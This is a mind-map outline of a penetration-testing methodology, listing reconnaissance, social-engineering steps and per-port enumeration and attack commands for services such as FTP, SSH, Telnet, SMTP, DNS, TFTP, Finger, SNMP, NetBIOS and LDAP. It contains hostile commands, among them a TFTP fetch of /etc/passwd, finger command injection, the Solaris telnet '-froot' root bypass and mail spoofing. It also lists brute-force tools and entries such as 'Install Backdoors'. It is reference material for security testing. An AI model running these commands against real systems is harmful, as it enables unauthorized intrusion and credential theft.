Penetration Testing Framework 0.58

Get Started. It's Free
or sign up with your email address
Penetration Testing Framework 0.58 by Mind Map: Penetration Testing Framework 0.58

1. X11 port 6000^ open

1.1. X11 Enumeration

1.1.1. List open windows

1.1.2. Authentication Method

1.1.2.1. Xauth

1.1.2.2. Xhost

1.2. X11 Exploitation

1.2.1. xwd

1.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

1.2.2. Keystrokes

1.2.2.1. Received

1.2.2.2. Transmitted

1.2.3. Screenshots

1.2.4. xhost +

1.3. Examine Configuration Files

1.3.1. /etc/Xn.hosts

1.3.2. /usr/lib/X11/xdm

1.3.2.1. Untitled

1.3.3. /usr/lib/X11/xdm/xsession

1.3.4. /usr/lib/X11/xdm/xsession-remote

1.3.5. /usr/lib/X11/xdm/xsession.0

1.3.6. /usr/lib/X11/xdm/xdm-config

1.3.6.1. DisplayManager*authorize:on

2. pwdump [-h][-o][-u][-p] machineName

3. Nabil contributed the AS/400 section.

4. Client Side Security

5. Back end files

5.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

6. Set objShell = CreateObject("WScript.Shell")

7. Check visible areas for sensitive information.

8. InitialProgram=c:\windows\system32\cmd.exe

9. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt

10. http://secunia.com/advisories/search/?search=citrix

11. Pre-Inspection Visit - template

12. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

12.1. Untitled

12.1.1. Authoratitive Bodies

12.1.1.1. IANA - Internet Assigned Numbers Authority

12.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

12.1.1.3. NRO - Number Resource Organisation

12.1.1.4. RIR - Regional Internet Registry

12.1.1.4.1. AFRINIC - African Network Information Centre

12.1.1.4.2. APNIC - Asia Pacific Network Information Centre

12.1.1.4.3. ARIN - American Registry for Internet Numbers

12.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

12.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre

12.1.2. Websites

12.1.2.1. Central Ops

12.1.2.1.1. Domain Dossier

12.1.2.1.2. Email Dossier

12.1.2.2. DNS Stuff

12.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

12.1.2.3. Fixed Orbit

12.1.2.3.1. Autonomous System lookups and other online tools available.

12.1.2.4. Geektools

12.1.2.5. IP2Location

12.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

12.1.2.6. Kartoo

12.1.2.6.1. Metasearch engine that visually presents its results.

12.1.2.7. MyIPNeighbors.com

12.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

12.1.2.8. My-IP-Neighbors.com

12.1.2.8.1. Excellent site that can be used if the above is down

12.1.2.9. myipneighbors.net

12.1.2.10. Netcraft

12.1.2.10.1. Online search tool allowing queries for host information.

12.1.2.11. Passive DNS Replication

12.1.2.11.1. Finds shared domains based on supplied IP addresses

12.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

12.1.2.12. Robtex

12.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

12.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

12.1.2.13. Traceroute.org

12.1.2.13.1. Website listing a large number links to online traceroute resources.

12.1.2.14. Wayback Machine

12.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

12.1.2.15. Whois.net

12.1.3. Tools

12.1.3.1. Cheops-ng

12.1.3.2. Country whois

12.1.3.3. Domain Research Tool

12.1.3.4. Firefox Plugins

12.1.3.4.1. AS Number

12.1.3.4.2. Shazou

12.1.3.4.3. Firecat Suite

12.1.3.5. Gnetutil

12.1.3.6. Goolag Scanner

12.1.3.7. Greenwich

12.1.3.8. Maltego

12.1.3.9. GTWhois

12.1.3.10. Sam Spade

12.1.3.11. Smart whois

12.1.3.12. SpiderFoot

12.2. Internet Search

12.2.1. General Information

12.2.1.1. Web Investigator

12.2.1.2. Tracesmart

12.2.1.3. Friends Reunited

12.2.1.4. Ebay - profiles etc.

12.2.2. Financial

12.2.2.1. EDGAR - Company information, including real-time filings. US

12.2.2.2. Google Finance - General Finance Portal

12.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

12.2.2.4. Companies House UK

12.2.2.5. Land Registry UK

12.2.3. Phone book/ Electoral Role Information

12.2.3.1. 123people

12.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

12.2.3.2. 192.com

12.2.3.2.1. Electoral Role Search. UK

12.2.3.3. 411

12.2.3.3.1. Online White Pages and Yellow Pages. US

12.2.3.4. Untitled

12.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

12.2.3.5. BT.com. UK

12.2.3.5.1. Residential

12.2.3.5.2. Business

12.2.3.6. Pipl

12.2.3.6.1. Untitled

12.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

12.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

12.2.3.7. Spokeo

12.2.3.7.1. http://www.spokeo.com/user?q=domain_name

12.2.3.7.2. http://www.spokeo.com/user?q=email_address

12.2.3.8. Yasni

12.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

12.2.3.9. Zabasearch

12.2.3.9.1. People Search Engine. US

12.2.4. Generic Web Searching

12.2.4.1. Code Search

12.2.4.2. Forum Entries

12.2.4.3. Google Hacking Database

12.2.4.4. Google

12.2.4.4.1. Email Addresses

12.2.4.4.2. Contact Details

12.2.4.5. Newsgroups/forums

12.2.4.6. Blog Search

12.2.4.6.1. Yammer

12.2.4.6.2. Google Blog Search

12.2.4.6.3. Technorati

12.2.4.6.4. Jaiku

12.2.4.6.5. Present.ly

12.2.4.6.6. Twitter Network Browser

12.2.4.7. Search Engine Comparison/ Aggregator Sites

12.2.4.7.1. Clusty

12.2.4.7.2. Grokker

12.2.4.7.3. Zuula

12.2.4.7.4. Exalead

12.2.4.7.5. Delicious

12.2.5. Metadata Search

12.2.5.1. Untitled

12.2.5.1.1. MetaData Visualisation Sites

12.2.5.1.2. Tools

12.2.5.1.3. Wikipedia Metadata Search

12.2.6. Social/ Business Networks

12.2.6.1. Untitled

12.2.6.1.1. Africa

12.2.6.1.2. Australia

12.2.6.1.3. Belgium

12.2.6.1.4. Holland

12.2.6.1.5. Hungary

12.2.6.1.6. Iran

12.2.6.1.7. Japan

12.2.6.1.8. Korea

12.2.6.1.9. Poland

12.2.6.1.10. Russia

12.2.6.1.11. Sweden

12.2.6.1.12. UK

12.2.6.1.13. US

12.2.6.1.14. Assorted

12.2.7. Resources

12.2.7.1. OSINT

12.2.7.2. International Directory of Search Engines

12.3. DNS Record Retrieval from publically available servers

12.3.1. Types of Information Records

12.3.1.1. SOA Records - Indicates the server that has authority for the domain.

12.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

12.3.1.3. NS Records - List of a host’s or domain’s name server(s).

12.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

12.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.

12.3.1.6. SRV Records - Service location record.

12.3.1.7. HINFO Records - Host information record with CPU type and operating system.

12.3.1.8. TXT Records - Generic text record.

12.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

12.3.1.10. RP - Responsible person for the domain.

12.3.2. Database Settings

12.3.2.1. Version.bind

12.3.2.2. Serial

12.3.2.3. Refresh

12.3.2.4. Retry

12.3.2.5. Expiry

12.3.2.6. Minimum

12.3.3. Sub Domains

12.3.4. Internal IP ranges

12.3.4.1. Reverse DNS for IP Range

12.3.5. Zone Transfer

12.4. Social Engineering

12.4.1. Remote

12.4.1.1. Phone

12.4.1.1.1. Scenarios

12.4.1.1.2. Results

12.4.1.1.3. Contact Details

12.4.1.2. Email

12.4.1.2.1. Scenarios

12.4.1.2.2. Software

12.4.1.2.3. Results

12.4.1.2.4. Contact Details

12.4.1.3. Other

12.4.2. Local

12.4.2.1. Personas

12.4.2.1.1. Name

12.4.2.1.2. Phone

12.4.2.1.3. Email

12.4.2.1.4. Business Cards

12.4.2.2. Contact Details

12.4.2.2.1. Name

12.4.2.2.2. Phone number

12.4.2.2.3. Email

12.4.2.2.4. Room number

12.4.2.2.5. Department

12.4.2.2.6. Role

12.4.2.3. Scenarios

12.4.2.3.1. New IT employee

12.4.2.3.2. Fire Inspector

12.4.2.4. Results

12.4.2.5. Maps

12.4.2.5.1. Satalitte Imagery

12.4.2.5.2. Building layouts

12.4.2.6. Other

12.5. Dumpster Diving

12.5.1. Rubbish Bins

12.5.2. Contract Waste Removal

12.5.3. Ebay ex-stock sales i.e. HDD

12.6. Web Site copy

12.6.1. htttrack

12.6.2. teleport pro

12.6.3. Black Widow

13. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

13.1. Default Port Lists

13.1.1. Windows

13.1.2. *nix

13.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

13.2.1. General Enumeration Tools

13.2.1.1. nmap

13.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml

13.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

13.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

13.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

13.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

13.2.1.2. netcat

13.2.1.2.1. nc -v -n IP_Address port

13.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

13.2.1.3. amap

13.2.1.3.1. amap -bqv 192.168.1.1 80

13.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

13.2.1.4. xprobe2

13.2.1.4.1. xprobe2 192.168.1.1

13.2.1.5. sinfp

13.2.1.5.1. ./sinfp.pl -i -p

13.2.1.6. nbtscan

13.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

13.2.1.7. hping

13.2.1.7.1. hping ip_address

13.2.1.8. scanrand

13.2.1.8.1. scanrand ip_address:all

13.2.1.9. unicornscan

13.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

13.2.1.10. netenum

13.2.1.10.1. netenum network/netmask timeout

13.2.1.11. fping

13.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

13.2.2. Firewall Specific Tools

13.2.2.1. firewalk

13.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

13.2.2.2. ftester

13.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

13.2.3. Default Passwords (Examine list)

13.2.3.1. Passwords A

13.2.3.2. Passwords B

13.2.3.3. Passwords C

13.2.3.4. Passwords D

13.2.3.5. Passwords E

13.2.3.6. Passwords F

13.2.3.7. Passwords G

13.2.3.8. Passwords H

13.2.3.9. Passwords I

13.2.3.10. Passwords J

13.2.3.11. Passwords K

13.2.3.12. Passwords L

13.2.3.13. Passwords M

13.2.3.14. Passwords N

13.2.3.15. Passwords O

13.2.3.16. Passwords P

13.2.3.17. Passwords R

13.2.3.18. Passwords S

13.2.3.19. Passwords T

13.2.3.20. Passwords U

13.2.3.21. Passwords V

13.2.3.22. Passwords W

13.2.3.23. Passwords X

13.2.3.24. Passwords Y

13.2.3.25. Passwords Z

13.2.3.26. Passwords (Numeric)

13.3. Active Hosts

13.3.1. Open TCP Ports

13.3.2. Closed TCP Ports

13.3.3. Open UDP Ports

13.3.4. Closed UDP Ports

13.3.5. Service Probing

13.3.5.1. SMTP Mail Bouncing

13.3.5.2. Banner Grabbing

13.3.5.2.1. Other

13.3.5.2.2. HTTP

13.3.5.2.3. HTTPS

13.3.5.2.4. SMTP

13.3.5.2.5. POP3

13.3.5.2.6. FTP

13.3.6. ICMP Responses

13.3.6.1. Type 3 (Port Unreachable)

13.3.6.2. Type 8 (Echo Request)

13.3.6.3. Type 13 (Timestamp Request)

13.3.6.4. Type 15 (Information Request)

13.3.6.5. Type 17 (Subnet Address Mask Request)

13.3.6.6. Responses from broadcast address

13.3.7. Source Port Scans

13.3.7.1. TCP/UDP 53 (DNS)

13.3.7.2. TCP 20 (FTP Data)

13.3.7.3. TCP 80 (HTTP)

13.3.7.4. TCP/UDP 88 (Kerberos)

13.3.8. Firewall Assessment

13.3.8.1. Firewalk

13.3.8.2. TCP/UDP/ICMP responses

13.3.9. OS Fingerprint

14. Enumeration

14.1. Daytime port 13 open

14.1.1. nmap nse script

14.1.1.1. daytime

14.2. FTP port 21 open

14.2.1. Fingerprint server

14.2.1.1. telnet ip_address 21 (Banner grab)

14.2.1.2. Run command ftp ip_address

14.2.1.3. [email protected]

14.2.1.4. Check for anonymous access

14.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

14.2.2. Password guessing

14.2.2.1. Hydra brute force

14.2.2.2. medusa

14.2.2.3. Brutus

14.2.3. Examine configuration files

14.2.3.1. ftpusers

14.2.3.2. ftp.conf

14.2.3.3. proftpd.conf

14.2.4. MiTM

14.2.4.1. pasvagg.pl

14.3. SSH port 22 open

14.3.1. Fingerprint server

14.3.1.1. telnet ip_address 22 (banner grab)

14.3.1.2. scanssh

14.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

14.3.2. Password guessing

14.3.2.1. ssh root@ip_address

14.3.2.2. guess-who

14.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

14.3.2.3. Hydra brute force

14.3.2.4. brutessh

14.3.2.5. Ruby SSH Bruteforcer

14.3.3. Examine configuration files

14.3.3.1. ssh_config

14.3.3.2. sshd_config

14.3.3.3. authorized_keys

14.3.3.4. ssh_known_hosts

14.3.3.5. .shosts

14.3.4. SSH Client programs

14.3.4.1. tunnelier

14.3.4.2. winsshd

14.3.4.3. putty

14.3.4.4. winscp

14.4. Telnet port 23 open

14.4.1. Fingerprint server

14.4.1.1. telnet ip_address

14.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster

14.4.1.2. telnetfp

14.4.2. Password Attack

14.4.2.1. Untitled

14.4.2.2. Hydra brute force

14.4.2.3. Brutus

14.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

14.4.3. Examine configuration files

14.4.3.1. /etc/inetd.conf

14.4.3.2. /etc/xinetd.d/telnet

14.4.3.3. /etc/xinetd.d/stelnet

14.5. Sendmail Port 25 open

14.5.1. Fingerprint server

14.5.1.1. telnet ip_address 25 (banner grab)

14.5.2. Mail Server Testing

14.5.2.1. Enumerate users

14.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

14.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

14.5.2.2. Mail Spoof Test

14.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT

14.5.2.3. Mail Relay Test

14.5.2.3.1. Untitled

14.5.3. Examine Configuration Files

14.5.3.1. sendmail.cf

14.5.3.2. submit.cf

14.6. DNS port 53 open

14.6.1. Fingerprint server/ service

14.6.1.1. host

14.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.

14.6.1.2. nslookup

14.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

14.6.1.3. dig

14.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

14.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

14.6.2. DNS Enumeration

14.6.2.1. Bile Suite

14.6.2.1.1. perl BiLE.pl [website] [project_name]

14.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

14.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

14.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

14.6.2.1.5. perl exp-tld.pl [input file] [output file]

14.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

14.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

14.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

14.6.2.2. txdns

14.6.2.2.1. txdns -rt -t domain_name

14.6.2.2.2. txdns -x 50 -bb domain_name

14.6.2.3. nmap nse scripts

14.6.2.3.1. dns-random-srcport

14.6.2.3.2. dns-random-txid

14.6.2.3.3. dns-recursion

14.6.2.3.4. dns-zone-transfer

14.6.3. Examine Configuration Files

14.6.3.1. host.conf

14.6.3.2. resolv.conf

14.6.3.3. named.conf

14.7. TFTP port 69 open

14.7.1. TFTP Enumeration

14.7.1.1. tftp ip_address PUT local_file

14.7.1.2. tftp ip_address GET conf.txt (or other files)

14.7.1.3. Solarwinds TFTP server

14.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)

14.7.2. TFTP Bruteforcing

14.7.2.1. TFTP bruteforcer

14.7.2.2. Cisco-Torch

14.8. Finger Port 79 open

14.8.1. User enumeration

14.8.1.1. finger 'a b c d e f g h' @example.com

14.8.1.2. finger [email protected]

14.8.1.3. finger [email protected]

14.8.1.4. finger [email protected]

14.8.1.5. finger [email protected]

14.8.1.6. finger **@example.com

14.8.1.7. finger [email protected]

14.8.1.8. finger @example.com

14.8.1.9. nmap nse script

14.8.1.9.1. finger

14.8.2. Command execution

14.8.2.1. finger "|/bin/[email protected]"

14.8.2.2. finger "|/bin/ls -a /@example.com"

14.8.3. Finger Bounce

14.8.3.1. finger user@host@victim

14.8.3.2. finger @internal@external

14.9. Web Ports 80,8080 etc. open

14.9.1. Fingerprint server

14.9.1.1. Telnet ip_address port

14.9.1.2. Firefox plugins

14.9.1.2.1. All

14.9.1.2.2. Specific

14.9.2. Crawl website

14.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source

14.9.2.2. httprint

14.9.2.3. Metagoofil

14.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

14.9.3. Web Directory enumeration

14.9.3.1. Nikto

14.9.3.1.1. nikto [-h target] [options]

14.9.3.2. DirBuster

14.9.3.3. Wikto

14.9.3.4. Goolag Scanner

14.9.4. Vulnerability Assessment

14.9.4.1. Manual Tests

14.9.4.1.1. Default Passwords

14.9.4.1.2. Install Backdoors

14.9.4.1.3. Method Testing

14.9.4.1.4. Upload Files

14.9.4.1.5. View Page Source

14.9.4.1.6. Input Validation Checks

14.9.4.1.7. Automated table and column iteration

14.9.4.2. Vulnerability Scanners

14.9.4.2.1. Acunetix

14.9.4.2.2. Grendelscan

14.9.4.2.3. NStealth

14.9.4.2.4. Obiwan III

14.9.4.2.5. w3af

14.9.4.3. Specific Applications/ Server Tools

14.9.4.3.1. Domino

14.9.4.3.2. Joomla

14.9.4.3.3. aspaudit.pl

14.9.4.3.4. Vbulletin

14.9.4.3.5. ZyXel

14.9.5. Proxy Testing

14.9.5.1. Burpsuite

14.9.5.2. Crowbar

14.9.5.3. Interceptor

14.9.5.4. Paros

14.9.5.5. Requester Raw

14.9.5.6. Suru

14.9.5.7. WebScarab

14.9.6. Examine configuration files

14.9.6.1. Generic

14.9.6.1.1. Examine httpd.conf/ windows config files

14.9.6.2. JBoss

14.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/

14.9.6.3. Joomla

14.9.6.3.1. configuration.php

14.9.6.3.2. diagnostics.php

14.9.6.3.3. joomla.inc.php

14.9.6.3.4. config.inc.php

14.9.6.4. Mambo

14.9.6.4.1. configuration.php

14.9.6.4.2. config.inc.php

14.9.6.5. Wordpress

14.9.6.5.1. setup-config.php

14.9.6.5.2. wp-config.php

14.9.6.6. ZyXel

14.9.6.6.1. /WAN.html (contains PPPoE ISP password)

14.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

14.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

14.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

14.9.6.6.5. /CF_Keyword.html (Content Filter)

14.9.6.6.6. /RemMagWWW.html (Remote MGMT)

14.9.6.6.7. /rpSysAdmin.html (System)

14.9.6.6.8. /LAN_IP.html (LAN)

14.9.6.6.9. /NAT_General.html (NAT)

14.9.6.6.10. /ViewLog.html (Logs)

14.9.6.6.11. /rpFWUpload.html (Tools)

14.9.6.6.12. /DiagGeneral.html (Diagnostic)

14.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

14.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

14.9.6.6.15. Config Backups

14.9.7. Examine web server logs

14.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

14.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq

14.9.8. References

14.9.8.1. White Papers

14.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

14.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

14.9.8.1.3. Blind Security Testing - An Evolutionary Approach

14.9.8.1.4. Command Injection in XML Signatures and Encryption

14.9.8.1.5. Input Validation Cheat Sheet

14.9.8.1.6. SQL Injection Cheat Sheet

14.9.8.2. Books

14.9.8.2.1. Hacking Exposed Web 2.0

14.9.8.2.2. Hacking Exposed Web Applications

14.9.8.2.3. The Web Application Hacker's Handbook

14.9.9. Exploit Frameworks

14.9.9.1. Brute-force Tools

14.9.9.1.1. Acunetix

14.9.9.2. Metasploit

14.9.9.3. w3af

14.10. Portmapper port 111 open

14.10.1. rpcdump.py

14.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

14.10.2. rpcinfo

14.10.2.1. rpcinfo [options] IP_Address

14.11. NTP Port 123 open

14.11.1. NTP Enumeration

14.11.1.1. ntpdc -c monlist IP_ADDRESS

14.11.1.2. ntpdc -c sysinfo IP_ADDRESS

14.11.1.3. ntpq

14.11.1.3.1. host

14.11.1.3.2. hostname

14.11.1.3.3. ntpversion

14.11.1.3.4. readlist

14.11.1.3.5. version

14.11.2. Examine configuration files

14.11.2.1. ntp.conf

14.11.3. nmap nse script

14.11.3.1. ntp-info

14.12. NetBIOS Ports 135-139,445 open

14.12.1. NetBIOS enumeration

14.12.1.1. Enum

14.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

14.12.1.2. Null Session

14.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

14.12.1.3. Smbclient

14.12.1.3.1. smbclient -L //server/share password options

14.12.1.4. Superscan

14.12.1.4.1. Enumeration tab.

14.12.1.5. user2sid/sid2user

14.12.1.6. Winfo

14.12.2. NetBIOS brute force

14.12.2.1. Hydra

14.12.2.2. Brutus

14.12.2.3. Cain & Abel

14.12.2.4. getacct

14.12.2.5. NAT (NetBIOS Auditing Tool)

14.12.3. Examine Configuration Files

14.12.3.1. Smb.conf

14.12.3.2. lmhosts

14.13. SNMP port 161 open

14.13.1. Default Community Strings

14.13.1.1. public

14.13.1.2. private

14.13.1.3. cisco

14.13.1.3.1. cable-docsis

14.13.1.3.2. ILMI

14.13.2. MIB enumeration

14.13.2.1. Windows NT

14.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

14.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

14.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

14.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

14.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

14.13.2.2. Solarwinds MIB walk

14.13.2.3. Getif

14.13.2.4. snmpwalk

14.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

14.13.2.5. Snscan

14.13.2.6. Applications

14.13.2.6.1. ZyXel

14.13.2.7. nmap nse script

14.13.2.7.1. snmp-sysdescr

14.13.3. SNMP Bruteforce

14.13.3.1. onesixtyone

14.13.3.1.1. onesixytone -c SNMP.wordlist <IP>

14.13.3.2. cat

14.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

14.13.3.3. Solarwinds SNMP Brute Force

14.13.3.4. ADMsnmp

14.13.3.5. nmap nse script

14.13.3.5.1. snmp-brute

14.13.4. Examine SNMP Configuration files

14.13.4.1. snmp.conf

14.13.4.2. snmpd.conf

14.13.4.3. snmp-config.xml

14.14. LDAP Port 389 Open

14.14.1. ldap enumeration

14.14.1.1. ldapminer

14.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

14.14.1.2. luma

14.14.1.2.1. Gui based tool

14.14.1.3. ldp

14.14.1.3.1. Gui based tool

14.14.1.4. openldap

14.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

14.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

14.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

14.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

14.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

14.14.2. ldap brute force

14.14.2.1. bf_ldap

14.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)

14.14.2.2. K0ldS

14.14.2.3. LDAP_Brute.pl

14.14.3. Examine Configuration Files

14.14.3.1. General

14.14.3.1.1. containers.ldif

14.14.3.1.2. ldap.cfg

14.14.3.1.3. ldap.conf

14.14.3.1.4. ldap.xml

14.14.3.1.5. ldap-config.xml

14.14.3.1.6. ldap-realm.xml

14.14.3.1.7. slapd.conf

14.14.3.2. IBM SecureWay V3 server

